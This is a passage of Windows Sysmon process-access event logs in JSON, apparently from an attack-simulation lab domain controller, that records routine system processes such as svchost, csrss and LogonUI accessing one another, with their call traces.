RT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":942,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":943,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nSourceProcessId: 1216\r\nSourceThreadId: 2016\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","SourceProcessId":"1216","SourceThreadId":"2016","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":944,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nSourceProcessId: 1216\r\nSourceThreadId: 2016\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","SourceProcessId":"1216","SourceThreadId":"2016","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":945,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nSourceProcessId: 1216\r\nSourceThreadId: 2016\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","SourceProcessId":"1216","SourceThreadId":"2016","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|c:\\windows\\system32\\fntcache.dll+17aaf|c:\\windows\\system32\\fntcache.dll+1a677|c:\\windows\\system32\\fntcache.dll+1aaac|c:\\windows\\system32\\fntcache.dll+502ee|c:\\windows\\system32\\fntcache.dll+4fff2|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":946,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":947,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":948,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.065\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2200\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-0010B46A0100}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.065","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"2200","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-0010B46A0100}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":949,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.065\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-0010B46A0100}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.065","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-0010B46A0100}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":950,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.065\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2104\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.065","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"2104","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":951,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.065\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-0010926E0100}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 